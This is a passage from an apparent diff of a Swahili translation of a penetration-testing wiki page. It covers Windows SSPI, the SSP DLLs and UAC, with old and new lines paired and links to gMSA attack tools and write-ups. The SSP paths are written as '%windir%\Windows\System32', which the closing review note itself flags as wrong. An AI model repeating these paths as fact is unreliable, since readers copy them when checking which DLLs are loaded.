SSPI itakuwa na jukumu la kutafuta itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili itifaki ipi ya uthibitishaji itakayokuwa inatumika, hizi itifaki za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kwa njia ya DLL na mashine zote mbili zinapaswa kuunga mkono ile ile ili kuweza kuwasiliana.
SSPI itawajibika kutafuta itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili itifaki gani ya uthibitishaji itakayotumika; itifaki hizi za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kama DLL na mashine zote mbili lazima ziunge mkono ile ile ili ziweze kuwasiliana.
### Main SSPs
### SSP kuu
- **Kerberos**: Ile inayopendekezwa
- **Kerberos**: Inayopendekezwa
- %windir%\Windows\System32\kerberos.dll
- **NTLMv1** na **NTLMv2**: Sababu za ulinganifu
- **NTLMv1** and **NTLMv2**: Sababu za utangamano
- %windir%\Windows\System32\msv1_0.dll
- **Digest**: Seva za wavuti na LDAP, nywila kwa njia ya MD5 hash
- **Digest**: Web servers na LDAP, nenosiri kwa fomu ya MD5 hash
- %windir%\Windows\System32\Wdigest.dll
- **Schannel**: SSL na TLS
- **Schannel**: SSL and TLS
- %windir%\Windows\System32\Schannel.dll
- **Negotiate**: Inatumika kujadili itifaki ya kutumia (Kerberos au NTLM, Kerberos ikiwa chaguo la msingi)
- **Negotiate**: Inatumika kujadiliana itifaki ya kutumia (Kerberos au NTLM, Kerberos ikiwa chaguo-msingi)
- %windir%\Windows\System32\lsasrv.dll
#### The negotiation could offer several methods or only one.
#### Mazungumzo yanaweza kutoa njia kadhaa au njia moja tu.
## UAC - User Account Control
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **kuonyeshwa kwa idhini kwa shughuli zilizoimarishwa**.
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **maombi ya idhini kwa shughuli zinazohitaji ruhusa ya juu**.
{{#ref}}
uac-user-account-control.md
{{#endref}}
## Marejeo
- [Relaying for gMSA cube0x0](https://cube0x0.github.io/Relaying-for-gMSA/)
- [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)
- [HTB Sendai 0xdf: gMSA via rights chaining to WinRM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
{{#include ../../banners/hacktricks-training.md}}
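Review bot: L597 and L603 replace the Swahili conjunction with English ("**NTLMv1** and **NTLMv2**", "**Schannel**: SSL and TLS") where the old L596 and L602 had "na"; same for the link text "[here]" left untranslated at L585 (use "[hapa]"). Outside the scope of this change but visible in the context lines: the SSP paths at L595, L598, L601, L604 and L607 are written as `%windir%\Windows\System32\...`; `%windir%` already expands to the Windows directory, so these should be `%windir%\System32\...` (or `%SystemRoot%\System32\...`), which is worth a follow-up fix since readers copy these paths when checking which SSP DLLs are loaded.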